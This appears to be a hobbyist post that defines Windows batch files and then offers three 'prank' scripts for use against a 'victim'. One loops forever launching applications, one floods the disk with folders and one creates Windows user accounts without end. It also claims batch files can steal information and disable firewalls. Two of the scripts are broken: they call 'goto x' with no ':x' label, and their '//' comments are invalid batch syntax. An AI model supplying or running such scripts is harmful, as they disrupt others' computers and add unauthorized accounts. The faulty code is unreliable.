What is a Batch File?
DOS, OS/2, and Microsoft Windows, a batch file is a text file
containing a series of commands intended to be executed by the command
interpreter. Similar to job control language and other systems on
mainframe and minicomputer systems, batch files were added to ease the
work required for certain regular tasks by allowing the user to set up a
batch script to automate many commands. When a batch file is run, the
shell program (usually COMMAND.COM or cmd.exe) reads the file and
executes its commands, normally line-by-line. Batch files are useful for
running a sequence of executables automatically and are often used to
automate repetitive or tedious processes.
DOS batch files have the filename extension
.bat. Batch files for other environments may have different extensions,
e.g. .cmd or .bat in the Microsoft Windows NT-family of operating
systems and OS/2, or .btm in 4DOS and 4NT related shells.
What Can Batch File Do?
can be used to delete the windows files, format data, steal
information, irritate victim, consume CPU resources to affect
performance, disable firewalls, open ports, modify or destroy registry
and for many more purposes.
Some Simple Codes Worth Trying:
copy the code to notepad and save it as givenameurself.bat (You can
give any name you wish but extension must be "bat" and save it as 'all
files' instead of text files).
1. Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open
different applications like paint, notepad, command prompt repeatedly,
irritating victim and of course affecting performance.
2. Folder flooder
@echo off
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would
generate a positive no. randomly. So this code would make start creating
folders whose name can be any random number.
3. User account flooder
@echo off
net user %random% /add //create user account
goto x
This code would start creating windows user accounts whose names could be any random numbers.
To be continued......
Source: en.wikipedia.org and elakiri.com
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